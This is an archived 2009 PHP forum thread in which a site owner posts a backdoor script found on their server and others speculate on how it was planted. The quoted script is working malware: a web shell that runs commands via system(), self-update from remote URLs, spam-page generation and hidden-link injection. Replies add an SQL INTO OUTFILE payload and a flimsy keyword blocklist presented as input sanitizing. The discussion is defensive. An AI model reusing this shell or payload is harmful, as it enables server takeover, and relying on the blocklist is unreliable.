dreamwest Posted September 17, 2009 Share Posted September 17, 2009 Its been a while since ive had a security breach but Heres something i found on my server today, im assuming is a brute force attack on login form, and its trying to write to .htaccess (permissions now 444). Any ideas on what else it might do?? <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $i_dor = trim($fconf[1]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname."\n"); fwrite($fconf, "0\n"); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("$tname/2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $cth = trim($a1t[$i_dor]); $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $links =""; if (($i_dor<196) || ($i_dor>199)) { for ($y=0; $y<22; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==196) { for ($y=0; $y<75; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==197) { for ($y=75; $y<150; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==198) { for ($y=150; $y<225; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==199) { for ($y=225; $y<300; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a></li> \n"; } } $fin = ereg_replace("<LINKS2>", $links, $fin); $curs = $cth; $fnd = fopen("$tname/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==196 || $i_dor==197 || $i_dor==198 || $i_dor==199)) { fwrite($fr, "$tname/$curs".".php\n"); } if (($md) && ($i_dor<196 || $i_dor>199) ) { fwrite($f2r, "$tname/$curs".".php\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n".$i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo "<ok>"; } Main(); ?> Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/ Share on other sites More sharing options...
.josh Posted September 17, 2009 Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920138 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 The fact someone got a PHP file on your server proves you need to write some security, Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920327 Share on other sites More sharing options...
dreamwest Posted September 17, 2009 Author Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. I use strip tags and str_replate to sanitize it, and i know that not nearly enough. Ive added this , ill see if that stops it: $username = substr(trim($_POST['username']),0,20); // prevent SQL-injection $username = str_replace('\\','\\\\', $username); $username = str_replace('"','\"', $username); // prevent XSS-attack, Shell-execute and JavaScript execution if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) { $username = ''; } if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) { $username = ''; } if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) { $username = ''; } if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) { $username = ''; } $password = substr(trim($_POST['password']),0,20); // prevent SQL-injection $password = str_replace('\\','\\\\', $password); $password = str_replace('"','\"', $password); // prevent XSS-attack, Shell-execute and JavaScript execution if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) { $password = ''; } if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) { $password = ''; } if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) { $password = ''; } if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) { $password = ''; } Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920415 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 /*No Comment*/ Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920417 Share on other sites More sharing options...
corbin Posted September 17, 2009 Share Posted September 17, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920428 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. I clean post, get, and requests using strip_tags and str_replace, and database queries with mysql_real_escape_string() Im outta ideas on how else they could do it Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920482 Share on other sites More sharing options...
corbin Posted September 18, 2009 Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920497 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? I do , i allow ppl to upload videos only....and its the only place i haven't checked. Ill do it now Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920516 Share on other sites More sharing options...
play_ Posted September 18, 2009 Share Posted September 18, 2009 Post a link. I'd like to see this video upload form Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920519 Share on other sites More sharing options...
waynew Posted September 19, 2009 Share Posted September 19, 2009 Upload script is probably vulnerable. Either that or your hosting is to blame. I'd go with the latter. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921210 Share on other sites More sharing options...
xylex Posted September 20, 2009 Share Posted September 20, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Not true. SELECT "<?php phpinfo();" INTO OUTFILE hack.php; Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921588 Share on other sites More sharing options...
corbin Posted September 20, 2009 Share Posted September 20, 2009 Hrmmm, true. I forgot about INTO OUTFILE . Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921593 Share on other sites More sharing options...
roopurt18 Posted September 20, 2009 Share Posted September 20, 2009 I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. And FTP information is sent in plain text from your machine to the server. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921603 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.